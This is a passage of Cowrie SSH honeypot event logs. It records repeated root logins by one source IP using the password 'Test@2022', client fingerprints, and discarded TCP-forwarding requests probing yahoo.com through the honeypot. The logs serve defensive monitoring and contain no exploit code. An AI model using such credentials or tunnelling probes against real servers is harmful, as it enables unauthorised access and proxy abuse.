{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.492352Z","src_ip":"213.209.150.239","session":"28ea76605ffa"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.541176Z","src_ip":"213.209.150.239","session":"28ea76605ffa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26923,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b2146ce2dce","protocol":"ssh","message":"New connection: 213.209.150.239:26923 (1.2.3.4:22) [session: 8b2146ce2dce]","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.587714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.596788Z","src_ip":"213.209.150.239","session":"8b2146ce2dce"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.635490Z","src_ip":"213.209.150.239","session":"8b2146ce2dce"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.871243Z","src_ip":"213.209.150.239","session":"8b2146ce2dce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23823,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23823","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.919400Z","session":"8b2146ce2dce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.966847Z","src_ip":"213.209.150.239","session":"8b2146ce2dce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20459,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20459","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.105705Z","session":"8b2146ce2dce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.153155Z","src_ip":"213.209.150.239","session":"8b2146ce2dce"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.201378Z","src_ip":"213.209.150.239","session":"8b2146ce2dce"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26974,"dst_ip":"1.2.3.4","dst_port":22,"session":"19386d74a376","protocol":"ssh","message":"New connection: 213.209.150.239:26974 (1.2.3.4:22) [session: 19386d74a376]","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.256905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.257938Z","src_ip":"213.209.150.239","session":"19386d74a376"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.314480Z","src_ip":"213.209.150.239","session":"19386d74a376"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.596460Z","src_ip":"213.209.150.239","session":"19386d74a376"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":32696,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32696","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.654828Z","session":"19386d74a376"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.711557Z","src_ip":"213.209.150.239","session":"19386d74a376"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":26909,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26909","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.867002Z","session":"19386d74a376"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.923966Z","src_ip":"213.209.150.239","session":"19386d74a376"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:25.981649Z","src_ip":"213.209.150.239","session":"19386d74a376"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27019,"dst_ip":"1.2.3.4","dst_port":22,"session":"18528fd803e9","protocol":"ssh","message":"New connection: 213.209.150.239:27019 (1.2.3.4:22) [session: 18528fd803e9]","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.028002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.038086Z","src_ip":"213.209.150.239","session":"18528fd803e9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.075302Z","src_ip":"213.209.150.239","session":"18528fd803e9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.310220Z","src_ip":"213.209.150.239","session":"18528fd803e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15002,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15002","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.358343Z","session":"18528fd803e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.405406Z","src_ip":"213.209.150.239","session":"18528fd803e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26898,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26898","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.541584Z","session":"18528fd803e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.589039Z","src_ip":"213.209.150.239","session":"18528fd803e9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.637464Z","src_ip":"213.209.150.239","session":"18528fd803e9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27064,"dst_ip":"1.2.3.4","dst_port":22,"session":"33af362c3961","protocol":"ssh","message":"New connection: 213.209.150.239:27064 (1.2.3.4:22) [session: 33af362c3961]","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.693452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.694988Z","src_ip":"213.209.150.239","session":"33af362c3961"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:26.751706Z","src_ip":"213.209.150.239","session":"33af362c3961"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.035432Z","src_ip":"213.209.150.239","session":"33af362c3961"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":5484,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:5484","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.093586Z","session":"33af362c3961"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.150841Z","src_ip":"213.209.150.239","session":"33af362c3961"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13413,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13413","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.307035Z","session":"33af362c3961"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.363747Z","src_ip":"213.209.150.239","session":"33af362c3961"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.422081Z","src_ip":"213.209.150.239","session":"33af362c3961"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27132,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db907533cbd","protocol":"ssh","message":"New connection: 213.209.150.239:27132 (1.2.3.4:22) [session: 6db907533cbd]","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.468111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.468818Z","src_ip":"213.209.150.239","session":"6db907533cbd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.516079Z","src_ip":"213.209.150.239","session":"6db907533cbd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.751003Z","src_ip":"213.209.150.239","session":"6db907533cbd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12747,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12747","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.799069Z","session":"6db907533cbd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.846251Z","src_ip":"213.209.150.239","session":"6db907533cbd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":21177,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21177","sensor":"my-vps","timestamp":"2025-08-26T01:03:27.981850Z","session":"6db907533cbd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.029348Z","src_ip":"213.209.150.239","session":"6db907533cbd"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.077270Z","src_ip":"213.209.150.239","session":"6db907533cbd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27183,"dst_ip":"1.2.3.4","dst_port":22,"session":"52bc4923a99b","protocol":"ssh","message":"New connection: 213.209.150.239:27183 (1.2.3.4:22) [session: 52bc4923a99b]","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.123560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.124400Z","src_ip":"213.209.150.239","session":"52bc4923a99b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-n